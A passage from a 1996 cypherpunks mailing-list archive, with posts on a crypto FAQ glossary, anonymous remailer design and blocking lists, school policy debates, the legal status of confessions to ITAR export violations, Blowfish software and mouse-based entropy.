encrypted message, resulting in a less predictable ciphertext message. This random block is known as the initialization vector. The decryption process also performs the function of removing the first block, resulting in the original plaintext. ITAR International Traffic in Arms Regulations. These are the rules by which munitions (including cryptography), as defined by the US State Department, may (or may not) be exported from the US. key A piece of data that, when fed to an algorithm along with ciphertext, will yield plaintext. (Or, when fed to an algorithm along with plaintext, will yield ciphertext. random session This is a temporary key that is generated specifically for key one message. Typically, in public key cryptosystems, the message to be sent is encrypted with a symmetric key that was specifically generated for that message. The encrypted version of that message, as well as the associated session key can then be encrypted with the recipient's public key. When the recipient decrypts the message, then, the system will actually decrypt the message it gets (which is the ciphertext message and the symmetric key to decrypt it), and then use the symmetric key to decrypt the ciphertext. The result is the plaintext message. This is often done because of the tremendous difference in the speed of symmetric vs. asymmetric ciphers. Contributors The following folks have contributed to this FAQ. Jeremey Barrett Gary Ellison Larry Kilgallen Dutra Lacerda Jim Ray Terry Ritter Robert Rothenburg Adam Shostack Rick Smith Randall Williams Jim Ray References 1. B. Schneier, Applied Cryptography, second edition, John Wiley & Sons, 1996 2. M. Blaze, W. Diffie, R. L. Rivest, B. Schneier, T. Shimomura, E. Thompson, M. Wiener, "Minimal Key Lengths for Symmetric Ciphers to Provide Adequate Commercial Security," available from ftp://ftp.research.att.com/dist/mab/keylength.ps -- C Matthew Curtin MEGASOFT, INC Chief Scientist I speak only for myself. Don't whine to anyone but me about anything I say. Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet cmcurtin at research.megasoft.com http://research.megasoft.com/people/cmcurtin/ From dsmith at prairienet.org Fri Sep 27 22:32:49 1996 From: dsmith at prairienet.org (David E. Smith) Date: Sat, 28 Sep 1996 13:32:49 +0800 Subject: Newsgroup proposal: misc.anonymous Message-ID: <199609280340.WAA00327@bluestem.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Fri Sep 27 22:31:58 1996 remailer at cypherpunks.ca blathered thusly... > This sounds like a good idea. I would certainly vote for such a news > group. Should the name be misc.anonymous or misc.anonymous.messages? > Are alt.anonymous and alt.anonymous.messages basically to different > newsgroups for exactly the same purpose, or is there some difference > between them. I believe that a.a is for discussion, and a.a.m is the "message pool." dave - ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702 dsmith at prairienet.org http://www.prairienet.org/~dsmith send mail with subject of "send pgp-key" for my PGP public key "Madness takes its toll . . . please have exact change ready." -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMkycMjVTwUKWHSsJAQFiOwf+K5IdIzZim++s9mRK9K0cIG1Ofh6+kWhV R9nrR8EglLTxOw97JdOIGhWeGFivWmU5IDbKaDVDnZFp3b14FWUu4680K5jRjGIU 3/M2DzKHOLKiZmoSkpBIuCYQ4IolrH4mBOMqNUpI/+mN0ORdDZ+ybfX4ThxTfabR jxDNAMSbhmls9SNpBOyYPV9bWCdrhSXyQ4jE8g5lljDa6YZX8fToBN6uIyEC6DJ2 t2FwLLWGhs9VKQPFwg9guguN3yFEYi9hVtrjHyFTzva3Vj/algpukdTTMXvLXV9N 4bVwULnh58X0J3ov9+vd4LOXWAlYD6b7ejbqZ8mw3NBJkzeAJyzmVw== =CfWp -----END PGP SIGNATURE----- From dsmith at prairienet.org Fri Sep 27 22:34:39 1996 From: dsmith at prairienet.org (David E. Smith) Date: Sat, 28 Sep 1996 13:34:39 +0800 Subject: Newsgroup proposal: misc.anonymous Message-ID: <199609280340.WAA00202@bluestem.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: dlv at bwalk.dm.com, cypherpunks at toad.com Date: Fri Sep 27 22:31:14 1996 > "Mark M." writes: > > In an effort to get anonymity and message pools more widespread, I > think it > > would be a good idea to establish a newsgroup for anonymous message > pools tha > > would get the same distribution as any other newsgroup in the "big 8". > The > > "misc" hierarchy is probably the best place for such a newsgroup since > it > > already carries groups like "misc.misc" and "misc.test". Does anyone > have an > > suggestions or objections? > > It should be under misc.activism: misc.activism.anonymity or even > m.a.privacy. This doesn't seem entirely appropriate for a message-pool group, which is what I understood as the original idea. m.a.anonymity would be a great place for a discussion group, though. dave - ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702 dsmith at prairienet.org http://www.prairienet.org/~dsmith send mail with subject of "send pgp-key" for my PGP public key "Madness takes its toll . . . please have exact change ready." -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMkycBTVTwUKWHSsJAQFuXgf7BWoshYYQ4qIjBLpZznba90iDlkCOgBBr dyAQDohGs8euJcUxAYejmg2MufekGR5KlhSq7qlqutF7b0ngcgQj0OtDboZz4M3y SIDZtealn5f6rNCz/r8utgc5hhUrkxJty9zYWphJxesBzSqWWw9yq5zU+7m0uKj0 9P3zN+9ezWpF9F45XH/c1NX9pIrJSax7n1ONYg6SyuSX+WfhFKSlFGHseBi7kV8f 5B/PhPFpYwCKfiqiW4Wang5qOqXzojXdddWOyBTTRoSxXHGoGlxcZ+aat+A7moI8 yjzwyDW2MA+yRLN0Z8a9rbIhuaBgpsqNL+fU5nFqaXOv98ZPiXcJDQ== =Zj+K -----END PGP SIGNATURE----- From attila at primenet.com Fri Sep 27 22:38:42 1996 From: attila at primenet.com (attila) Date: Sat, 28 Sep 1996 13:38:42 +0800 Subject: Public Schools In-Reply-To: <199609280109.UAA00349@smoke.suba.com> Message-ID: <199609280353.VAA23910@InfoWest.COM>  There is a solution. Trade Schools,  This is the single most important fact in the U.S. inability maintain the manufacturing prowess we enjoyed until some poorly defined point in time after WWII! 1. several waves of immigration, most notably Germany after WWI, brought thousands of skilled machinists, &c. many of whom went the trade school route by screening or by socio-economic factors. 2. the U.S. prior to 1920 had an excellent trade school and apprentice program. WWII was the breaking point. the younger generation who survived the war wanted more for their children --hence the college emphasis for _everyone_! The problem was simple: we have only the now retiring toolmakers who make it all possible. engineering graduates will not observe the manufacturing floors since it is above their dignity to roll of their sleeves. if engineers were required to serve internships in the shops, as doctors are required to intern in a hospital (and the really good ones, the top of the class, choose what I call meat-wagon wards (large city ER and trauma units), the U.S. would be a far healthier and competitive environment. I know, why the meat wagon wards with their pressure and unreasonable hours? experience, anything and everything comes through those doors every night, and it goes off the scale on the weekends... is there any reason to send an illiterate to college other to socialize? is there any reason why the school system can only see a college degree other than for those who they prejudged to be just another generation of welfare mothers and deadbeat dads? why do many with 4 year college degrees only work as entry level secretaries, Burger King night "managers." &c? then what do the rest of them do? join the cradle to the grave dole gener- ation! and Parental Envolvement. It could very well be (and if I had the money I'd make the bet) that _many_ of the "troubled" youth of today are simply undisiplined.  more the problem that the parents become interested too late, after the child has seen 2,000 murders on TV before the age of 6; walked the streets of parentless daytime; started cocaine at 16, maybe even 10; running for a gang.... then they wail at the funeral: "...it's not fair, johnny was such a good boy... society never gave him a chance...." what they mean is they collect a $100/mo or so less from welfare! I have raised(ing) 5 children --no TV in the house, and G rated movies occasionally. what did/do the children find to do? read, read, and read. I don't have a problem trying to pry children away from a TV --but I often hear: "...puh-leez, daddy, just let me finish this chapter." No such luck.... (Fortunately, most of them couldn't afford to bet against their parents in an AP world).  real true... It would also seem to follow that if parents were spending their own money (or perceived it as their own money) that they would take a greater interest in their childrens education.  ...if they were smart enough to start about age 3. the problem is further excaberated by the fact the average family expects the state to provide the "enthusiasum" --is there any reason then, to expect other than Hillary's "It's a global village" with her brand of liberal brainwashing of the next generation (all new revisionist history, etc.). Welcome to "Logan's Run!" fortunately, I have no problem with the public schools. I'm not the only one in the neighborhood without a TV, and the community has trade schools mixed with the high schools, and a two year college to supplement the advanced placement programs. very few families have two parents working. the kids can play outside after dark, and our young women can walk by themselves after dark. (I do admit that one good scream would have an extremely well-armed about to be posse out the door in 15 seconds... --I doubt there would be prisoners!) a very unusual situation --but I live in rural southern utah where the regional middle school of 1200 can support 4 bands, the top 2 being very impressive, and provide full AP classes, and ACT scores averaging 24-26+ v. the national average of 20 for inbound freshman. and, where an average ward (100-150 families) will have at least a dozen Eagle scouts. proves your point, I guess... From stewarts at ix.netcom.com Fri Sep 27 22:45:12 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sat, 28 Sep 1996 13:45:12 +0800 Subject: Making Remailers Widespread Message-ID: <199609280358.UAA02589@dfw-ix4.ix.netcom.com> I've been thinking about how to make one-way remailers a widespread commodity, rather than the novelty item they are today. Doing two-way remailers would be better, but that's still a hard problem, and I don't want to widely deploy shoddy two-way-remailers. Suppose we add form-based remailer support to a popular SSL-equipped HTTP server, such as Apache-SSL, by putting remailer.pl and a remailer form in the default setup, which would deploy hundreds of remailers with minimal effort. What would we have to do to make it work well, rather than turn into a public relations disaster and spam explosion? - The remailer script would have to add disclaimers at the beginning and/or end of the message reminding readers that the message is anonymous, and to contact the remailer cabal rather than the postmaster. - Blocking becomes a big problem - it's annoying enough now, when there are a small number of remailers with hard-working operators; we'd need some sort of automated blocking support to make it usable by relatively non-involved operators - A centralized block list (e.g. http://www.remailer.net/block.txt) which all of the form-based remailers could load and reference would allow non-picky operators not to have to handle it themselves - Implementing the blocking list as a web form for people who want to be blocked would make it relatively painless to use; remailer-operators wouldn't have to transcribe email from the remailer-operators list to use it, which helps with other problems. - Of course, once anybody can fill out their name and ask to be blocked, it's possible for spoofers to block people who don't want to be. One approach for preventing this is to implement a three-way handshake - user fills out form, form mails back blocking notice with cookie, user returns cookie to complete blocking - this is a bit messier for mailing lists, but we can ignore... - special-case for "postmaster", who may want to block all of foo.domain instead of just postmaster at foo.domain - special-special-case for postmasters of big sites, e.g. aol, netcom, who we may want to ignore? - A sender-blocking list is harder, and may still take human attention - remailer chaining - allow user to put in another Apache-remailer site so we don't have to limit the chaining to known short list of sites. The remailer.pl can send an https foo.bar.com remailer.pl PUT - The remailer form can probably just have field for second site, if empty don't use. I suppose remailer.pl could also automagically add that in when it posts. Technical question: - How do we initiate an http or https PUT from a script? I assume there's probably some perl add-in for posting http/https? Is there a command-line-shell interface that can fetch URLs? # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From saken at chardos.connix.com Fri Sep 27 23:07:35 1996 From: saken at chardos.connix.com (Scott Kenney) Date: Sat, 28 Sep 1996 14:07:35 +0800 Subject: Anonymous Mail at US Post In-Reply-To: <32488092.4B8B2A3A@best.com> Message-ID: Greg Kucharo wrote: : : I don't know if anyone else has seen this, but I was mailing letters : in the "out front" boxes the other day when I noticed a sign. The sign : said that all packages 16 ounces or over had to be taken inside for : disposal into the mail slot. The obvious explanation being that even : though you can abstain from marking a return address, the postal : inspectors would like a nice photo of you with your mail. Note that neither the USPS or the Postal inspection service really want anything to do with this crap. This was mandated by the FAA which threatened to stop allowing the mails to be carried on domestic passenger flights. - scott kenney * saken at chardos.connix.com * freebsd hacker * toriphile disgruntled postal worker * aimee-fan From pgut001 at cs.auckland.ac.nz Fri Sep 27 23:26:49 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Sat, 28 Sep 1996 14:26:49 +0800 Subject: Mitsubishi MISTY LSI Message-ID: <84388570628017@cs26.cs.auckland.ac.nz> >Does anyone have a reason not to consider this algorithm snake oil? e.g.: > >Was it developed by a well known cryptographer? >Has it been vetted by someone/some organization with reputation? > >I other words, why should we trust it? It was developed by a team lead by Mitsuru Matsui and has been subject to fairly intense analysis, although not by non-Mitsubishi people AFAIK. In any case it's not the usual snake oil. When I last talked to someone from Mitsubishi who was working on Misty I tried to convince them to make details available online, you could try something like www.melco.co.jp to see if there's anything available. Peter. From root at bushing.plastic.crosslink.net Fri Sep 27 23:51:47 1996 From: root at bushing.plastic.crosslink.net (Ben Byer) Date: Sat, 28 Sep 1996 14:51:47 +0800 Subject: Public Schools In-Reply-To: Message-ID: <199609280512.BAA02469@bushing.plastic.crosslink.net> > > On Fri, 27 Sep 1996, ronsimpson wrote: > > > I hate to burst any bubbles but, the school with the highest number of > > National Merit Finalists and highest number of 1600 SATs is a Public > > High School (Jefferson High in Fairfax, VA) > > > > Yeah, Fairfax has good schools. But you're misrepresenting the truth: > what school has the highest *percentage* of 1600 SATers, etc. > > I suspect Jefferson High is larger than most private schools. It's kind of funny to me to see Jefferson being discussed like this, speaking as a student of it. :) Actually, it's not all that big a school, thanks to the magic of controlled admissions, with 1600 students for 4 grades. This may be a larger number than many private schools, but it is half the size of many of the other public schools. Jefferson probably has one of the highest percentages in the country, if only because you have to pass a rigorous standardized test just to get accepted to it. -- Ben Byer root at bushing.plastic.crosslink.net I am not a bushing From tcmay at got.net Sat Sep 28 00:01:20 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 28 Sep 1996 15:01:20 +0800 Subject: Public Schools In-Reply-To: <199609280109.UAA00349@smoke.suba.com> Message-ID: At 3:02 AM +0000 9/28/96, attila wrote: > a very unusual situation --but I live in rural southern utah > where the regional middle school of 1200 can support 4 bands, the > top 2 being very impressive, and provide full AP classes, and ACT Wow! Utah is teaching AP? Is Jim Bell being brought in as a Special Lecturer? (I knew Idaho has special Militia classes, but to hear that Utah is now teaching Assassination Politics is pretty impressive.) --Tim We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From wa6ube at ix15.ix.netcom.com Sat Sep 28 00:14:49 1996 From: wa6ube at ix15.ix.netcom.com (Patricia Gibbons) Date: Sat, 28 Sep 1996 15:14:49 +0800 Subject: [CRYPTO] (was: sig/noise ratio) In-Reply-To: <199609271930.MAA04776@well.com> Message-ID: <324CBFD1.6BCB@popd.ix.netcom.com> Brian D Williams wrote: > > In the interest of those who wish a significant increase in the > signal/noise ratio I make a proposal. Significant crypto related > posts could be prefaced with [CRYPTO] on the subject line on a > strictly volunteer basis, that way those desiring a more topical > list could have one simply by setting the appropriate filter. > > Items crypto related but missing the [CRYPTO] header could be > reposted by well meaning souls. > > Other appropriate headers could of course be used. > > Brian I will be the first on my block to 2nd this excellent idea! -- Trish, WA6UBE at ix.netcom.com "The Vertical Skywave Girl" ... Mobile repair shop supervisor - City of San Jose/ ITD-Communications PGP Keyserver Webpage: < http://bs.mit.edu:8001/pks-toplev.html > From gbroiles at netbox.com Sat Sep 28 03:11:59 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Sat, 28 Sep 1996 18:11:59 +0800 Subject: "Confessing to a felony" Message-ID: <3.0b19.32.19960928013142.0069aa3c@ricochet.net> At 06:30 PM 9/27/96 -0800, Tim May wrote: > >Hearing me say I "exported crypto," a hearsay claim, and happening to find >one or more laptops at my home, weeks or months later, implies nothing. >Legal proof is still needed. Given only a nebulous statement like "I >exported crypto in violation of the ITARs," or "I shipped PGP to Europe," >is not enough for a case even to be brought to trial. > >(If it reached trial, I would expect a defense attorney to move for >dismissal. Absent any evidence that a crime occurred, absent any proof >beyond the nebulous hearsay statement of a "braggart," there is simply no >basis for criminal action.) > >"Stupid bragging criminals" may be common, but bragging is not in and of >itself illegal. There still has to be evidence of a crime. > >"Produce the body." I mostly agree re the "corpus delicti" rule (a confession must be corroborated by independent evidence that a crime has been committed, common law federally, statutory in Oregon (ORS 136.425(1)) but disagree with your use of "hearsay" - statements of a defendant in a criminal proceeding are not hearsay because they're the statements of a party opponent. (In federal court and in Oregon, anyway - in California they're hearsay but admissible as an exception. FRE 801(d)(2), ORE 801(4)(b), Cal Evid Code 1220.) This quote from _US v. Singleterry_ (CA1, 1994) (sorry no F2 cite, found it on a net database of slip opinions) does a nice job of addressing the question at hand: "To begin with, we note that a defendant's own statements are never considered to be hearsay when offered by the government; they are treated as admissions, competent as evidence of guilt without any special guarantee of their trustworthiness. See Fed. R. Evid. 801(d)(2) & advisory committee's note; see also United States v. Barletta, 652 F.2d 218, 219 (1st Cir. 1981). Nevertheless, there is a danger that the jury will rush to credit a confession without seriously considering whether the defendant confessed to a crime he did not commit. As a result, the federal courts have adopted common law rules designed to prevent a jury from convicting the defendant solely on the basis of an untrustworthy confession. The general rule is that a jury cannot rely on an extrajudicial, post-offense confession, even when voluntary, in the absence of "substantial independent evidence which would tend to establish the trustworthiness of [the] statement." Opper v. United States, 348 U.S. 84, 93 (1954). See also Smith v. United States, 348 U.S. 147 (1954); Warszower v. United States, 312 U.S. 342 (1941); United States v. O'Connell, 703 F.2d 645 (1st Cir. 1983). The Court has explained that independent proof of the commission of the charged offense is not the only means of establishing the trustworthiness of the defendant's confession; another "available mode of corroboration is for the independent evidence to bolster the confession itself and thereby prove the offense `through' the statements of the accused." Smith, 348 U.S. at 156." (footnotes omitted) I think the question of what *would* constitute the corpus delicti is interesting; the mere presence of PGP overseas shouldn't be enough. And evidence like PGP's presence on a laptop which had once been overseas, or airline ticket stubs or passport stamps or testimony from a security officer who remembered making the defendant turn on the laptop at the metal detector, or even surveillance camera footage would corroborate the defendant's confession but not establish that a crime was committed. Such evidence would seem to get us closer to the latter test mentioned in _Singleterry_ but wouldn't meet Oregon's test of "some other proof that the crime has been committed" (ORS 136.425) nor California's "the charged crime actually happened" (People v. Jennings (1991) 53 Cal.3d 334, 368) standard. But an ITAR prosecution would occur in Federal court, where evidence which merely corroborates the confession (instead of proving a crime) may be sufficient. (And, of course, this is all just so much jawboning. Not legal advice. I'm inclined to avoid confessing to crimes via the Internet whether or not it seems likely to lead to prosecution or conviction. I've already been to one job interview where the employer had seen (and was unnerved) by my vocal presence on the net.(!?!) Which is OK with me because if I make someone nervous when they read Alta Vista, just wait until they meet me. :) It's time to get used to the idea that whatever we write may come back in 20 or 30 or 40 years, whether we like it or not. I think it'll teach us both a sense of forgiveness and a sense of discretion, but that may take awhile.) -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From attila at primenet.com Sat Sep 28 04:31:18 1996 From: attila at primenet.com (attila) Date: Sat, 28 Sep 1996 19:31:18 +0800 Subject: Public Schools In-Reply-To: Message-ID: <199609280943.DAA28475@InfoWest.COM> In , on 09/27/96 at 10:36 PM, "Timothy C. May" said: At 3:02 AM +0000 9/28/96, attila wrote: > a very unusual situation --but I live in rural southern > utah where the regional middle school of 1200 can support 4 > bands, the top 2 being very impressive, and provide full AP > classes, and ACT Wow! Utah is teaching AP? Is Jim Bell being brought in as a Special Lecturer?  come on, Tim... you are not that old. AP has three meanings (at least): 1. Associated Press (news gathering) 2. Advanced Placement (as in college credit for HS classes) 3. not widely known: Jim Bell's Assassination Political Inanity. I wonder if Jim Bell would enjoy his stay in Utah's Dixie? there is only one bar in Washington county, and I understand it's pretty limited (if you even find it!). (I knew Idaho has special Militia classes, but to hear that Utah is now teaching Assassination Politics is pretty impressive.) Utah does not need militia classes: 1. opening of deer season (Oct 20) is a state holiday. every- thing shuts down: schools, business, government... we take it real serious.... 2. according to info I scanned from one of those moving target bleeding heart liberals, utahns have more weapons than children, and you know we have a lot of children. 3. if you are aware of Mormon heritage: despite a trail of blood from Kirtland (mild), Missouri (3 times, severe), and Nauvoo (medium), only one incident (in Missouri) found Mormons fighting to defend themselves. In Utah, we endured an occupying U.S. army for almost 50 years while statehood was denied... and our leaders were imprisoned, property and assets confiscated, etc. that's OK, tim; I'm glad you're still feeling your oats in your old age! -- one of the few things we all share: the utter, corrosive contempt for our elected officials. From Scottauge at aol.com Sat Sep 28 08:44:20 1996 From: Scottauge at aol.com (Scottauge at aol.com) Date: Sat, 28 Sep 1996 23:44:20 +0800 Subject: Crypto and six yr old sex perverts: Project Electric Potatoes [CRYPTO] Message-ID: <960928093843_295524911@emout08.mail.aol.com> Using crypto may be required to keep ya outta jail, given the guberment has gone so far low as to "route out this six year old sex pervert busy kissing the girls." (Quoted for emphasis.) I wonder when sexual harassment will become a sex offence. Are the red sashed sex cores of Orwell's 1984 around the corner? I wonder if he will need to register with the sheriffs office in any towns he moves into as a sex offender - or has that law not passed yet? Soon I believe our communications will be turned against us - as I am sure I will hear about this one in the future.... Crypto can help us from the all intrusive guberment - it is far to big. Hence a new project for us all: Multicast Crypto referred to as Electric Potatoes as mashed up potatoes are hard to put back together. Purpose: Already we are seeing problems for speech on the internet (see radikal postings - though they are a bit fruity IMHO.) And it sounds like the law in one country is going to be very interested in arresting people in another. Hence, perhaps we need a crypto system (including human procedures and fail safes) for community discussions. Crypto is very much one to one right now, but can we implement a crypto for wide distribution to a very defined set of people? This should be useful in commerce too... like CC of mail to others, etc. Problem Definition Time: Who will be responsible for allowing a member into the community? (And all the other trust issues...) The software to implement the community must be available on multiple platforms like UNIX, Windoze, Macintosh, NeXT, etc. How do we over come the problems of storage - should the messages remain encyphered at all times in local storage of a member in case of a knock on the door, requiring the user to use the software to read, write, store, and organize messages. Is it even possible to overcome the human turncoat factor? Can we protect them as well as us from coercian, black mail, seizure, or defection? Is this even possible, because we are looking for the freedom to speak, yet nobody will be able to hear us!!! ********** Method of discussion: Since we will all hopefully have many ideas and comments on this exercise,may I provide a protocal: Please have Project Electric Potatoes in the subject heading - some of us use the delete key quite freely and don't want to accidently remove your valued comments and ideas. Should the message contain a problem definition, please have Problem in the subject. Should the message contain an answer please have Answer in the subject. Should the message contain a rant, please have Rant in the subject. I leave it to the writer to include [CRYPTO] in the header.... Thank You All, and I hope we get a great discussion going on here. From jk at stallion.ee Sat Sep 28 09:34:01 1996 From: jk at stallion.ee (=?ISO-8859-1?Q?J=FCri_Kaljundi?=) Date: Sun, 29 Sep 1996 00:34:01 +0800 Subject: WARNING: This Message Actually Contains a Question Reguarding Crypto! In-Reply-To: <199609241649.LAA22238@mailhub.amaranth.com> Message-ID: Tue, 24 Sep 1996, William H. Geiger III wrote: > I just recently downloaded copies of Blowfish & Ghost. > > Does anyone have any experiance with these two algorithims? > > Does anyone know how they are using Blowfish and why? A program called F-Secure Desktop for Windows 3.x and Windows 95 is using Blowfish with 256-bit keys. It is meant for encrypting the files on your hard disk and it works nicely together with Windows File Manager or Windows95 shell. I would say it is one of the best strong and easy to use HD encryption programs (only that it costs $$). It is manufactured by Datafellows, who is also distributing F-Secure SSH. You can download the demo version at http://www.datafellows.com/f-secure/ Why they are using it: may be because it is fast on Intel Pentium and Pentium Pro processors, as discussed in Applied Cryptography? J�ri Kaljundi AS Stallion jk at stallion.ee From dlv at bwalk.dm.com Sat Sep 28 10:03:19 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 01:03:19 +0800 Subject: Making Remailers Widespread In-Reply-To: <199609280358.UAA02589@dfw-ix4.ix.netcom.com> Message-ID: Bill Stewart writes: ... > Doing two-way remailers would be better, but that's still a hard problem, > and I don't want to widely deploy shoddy two-way-remailers. Unfortunately, one-way remailers have much fewer uses than two-way remailers, any many of these uses are abusive. > - The remailer script would have to add disclaimers at the beginning > and/or end of the message reminding readers that the message is > anonymous, and to contact the remailer cabal rather than the postmaster. Julf's anon.penet.fi used to add a signature with a disclaimer. > - Blocking becomes a big problem - it's annoying enough now, > when there are a small number of remailers with hard-working operators; > we'd need some sort of automated blocking support to make it > usable by relatively non-involved operators Yes. > - A centralized block list (e.g. http://www.remailer.net/block.txt) > which all of the form-based remailers could load and reference would > allow non-picky operators not to have to handle it themselves A single centralized point of failure is bad. Maybe 4 or 5 redundant ones. A blocking request sent to one will be replicated in the other automatically. > - Implementing the blocking list as a web form for people who > want to be blocked would make it relatively painless to use; > remailer-operators wouldn't have to transcribe email from the > remailer-operators list to use it, which helps with other problems. > > - Of course, once anybody can fill out their name and ask to be > blocked, it's possible for spoofers to block people who don't want to be. > One approach for preventing this is to implement a three-way handshake > - user fills out form, form mails back blocking notice with cookie, > user returns cookie to complete blocking That's the protocol Eric Thomas's listserver uses to make sure mailing list subscription requests aren't spoofed. I think I mentioned it recently on this list in the context of creating a similar blocking list for addresses that don't want to receive unsolicited commercial e-mail. Indeed, if such a system is put up, it could maintain several blocking lists: addresses who don't want any remailer mail addresses who don't want 1-way remailer mail, but are willing to get 2-way remailer mail addresses who don't want unsolicited commercial e-mail (probably a biggie :-) addresses who will only accept PGP-signed e-mail etc. > - this is a bit messier for mailing lists, but we can ignore... We can't quite ignore... In the scheme you've just described, someone can enter a blocking request via a Web page and give a submission request for some mailing list, and the cookie will be e-mailed to the mailing list. > - special-case for "postmaster", who may want to block > all of foo.domain instead of just postmaster at foo.domain > - special-special-case for postmasters of big sites, e.g. aol, netcom > who we may want to ignore? > - A sender-blocking list is harder, and may still take human attention I don't think it's a good idea to suport blocking receivers in an entire domain, like *@aol.com. Just say it's not supported. I don't think it's a good idea to support sender blocking at all. Would the receiver blocking list be available to everyone to view? That sounds like a violation of privacy. Someone suggested on this list that (assuming that the entires are addresses that match exactly, not regular expressions), one can store hashes of addresses. Then when a remailer wants to know if a particular address is on the list, it computes the hash and searches for it (binary search is fast). A curious person can check whether a particular address is no the list, but can't obtain the list of all blocked receivers. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From deviant at pooh-corner.com Sat Sep 28 10:51:36 1996 From: deviant at pooh-corner.com (The Deviant) Date: Sun, 29 Sep 1996 01:51:36 +0800 Subject: Public Schools In-Reply-To: <199609280109.UAA00349@smoke.suba.com> Message-ID: On Fri, 27 Sep 1996, snow wrote: > Date: Fri, 27 Sep 1996 20:09:36 -0500 (CDT) > From: snow > To: jbugden at smtplink.alis.ca > Cc: cypherpunks at toad.com > Subject: Re: Public Schools > > James said: > > ronsimpson at unidial.com wrote: > > >I hate to burst any bubbles but, the school with the highest number > > > of National Merit Finalists and highest number of 1600 SATs is a=20 > > > Public High School (Jefferson High in Fairfax, VA) > > The same is true for Montreal (Royal Vale) using the equivalent scoring methods. > > But there are public schools at both extremes of the curve. > > While it is true that Private Schools would not survive due to market forces if > > they did consistently poorly, it is also true that they filter their incoming > > student body in a manner that Public Schools can not. > > If you want to refuse those who are too stupid or anti-social from Public > > Schools in order to improve the social or intellectual climate, you better have > > a solution for the resulting cast-offs. > > There is a solution. Trade Schools, and Parental Envolvement. It could > very well be (and if I had the money I'd make the bet) that _many_ of the > "troubled" youth of today are simply undisiplined. (Fortunately, most of > them couldn't afford to bet against their parents in an AP world). It would > also seem to follow that if parents were spending their own money (or > perceived it as their own money) that they would take a greater interest in > their childrens education. > > For those that are truly not scholastically oreinted, there would be > trade schools. I would also bet that you could teach a child everything they > need to learn (other than a trade) to cope in this world in about 4 years. > But now we must make a disinction... I'm LD in writing, but can read very well (when I was in 6th grade I could read like a 10th grader), and do very well in Math and Computer classes (and non-biological/anatomical sciences). So should I be in trade school, because I plan on being a computer programmer, or go to college? Sure, I don't do well in language and (depending on the class) some history classes, which, IMHO, are weighted more heavily than they should be in both public _and_ private schools (and yes, I've been to both), but I don't think that should mean I can't go to college... Anyway, my point is that there is, at times, a very fine line... --Deviant When we write programs that "learn", it turns out we do and they don't. From deviant at pooh-corner.com Sat Sep 28 10:58:31 1996 From: deviant at pooh-corner.com (The Deviant) Date: Sun, 29 Sep 1996 01:58:31 +0800 Subject: Public Schools In-Reply-To: Message-ID: On Fri, 27 Sep 1996, Timothy C. May wrote: > Date: Fri, 27 Sep 1996 22:36:57 -0800 > From: "Timothy C. May" > To: cypherpunks at toad.com > Subject: Re: Public Schools > > At 3:02 AM +0000 9/28/96, attila wrote: > > > a very unusual situation --but I live in rural southern utah > > where the regional middle school of 1200 can support 4 bands, the > > top 2 being very impressive, and provide full AP classes, and ACT > > Wow! Utah is teaching AP? Is Jim Bell being brought in as a Special Lecturer? > > (I knew Idaho has special Militia classes, but to hear that Utah is now > teaching Assassination Politics is pretty impressive.) > > --Tim > Umm.. I think he meant AP as in "Advanced Placement", ah la college classes in high school. But who knows, maybe you were being sarcastic... --Deviant The first time, it's a KLUDGE! The second, a trick. Later, it's a well-established technique! -- Mike Broido, Intermetrics From jamesd at echeque.com Sat Sep 28 11:15:25 1996 From: jamesd at echeque.com (James A. Donald) Date: Sun, 29 Sep 1996 02:15:25 +0800 Subject: Mousepad RNG's? Message-ID: <199609281551.IAA03203@dns2.noc.best.net> At 08:14 PM 9/27/96 +0200, Anonymous wrote: > I just downloaded a copy of the beta version of Datafellows > Windows 3.1 SSH and it asked to move the mouse around to > generate some randomness. In reading Applied Crypto, it > mentioned that there is no such thing as generating > randomness from a personal computer unless something like > a Geiger counter is used. Is there any way to create a > fairly random sample from the mouse? Should one use lots > of jerky movements, or take ones time with it? In this case the entropy is the negative of the logarithm of the probability that you or someone else could exactly duplicate those mouse movements. I would guess that you get at least three bits a second just doodling around, so half a minute of doodles (a pretty long time) should be unbreakable. Some time ago, at a cypherpunks conference, people were making all sorts of ridiculous proposals for being really, really, really, sure that you had real entropy, and a prominent cypherpunk, possibly Tim May, said, "This is ridiculous: Nobody ever broke good crypto through weakness in the source of truly random numbers". Sometime after that Netscape was broken through weakness in the source of truly random numbers. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From azur at netcom.com Sat Sep 28 11:17:58 1996 From: azur at netcom.com (Steve Schear) Date: Sun, 29 Sep 1996 02:17:58 +0800 Subject: Basis of FCC Jurisdiction [RANT] Message-ID: Last week I started a thread on the Telecom Regulation list. My intention was to introduce discussion of some circe-1780s Republican questioning, as opposed to the widely accepted Federalist. The most interesting composite result is below: >Date: 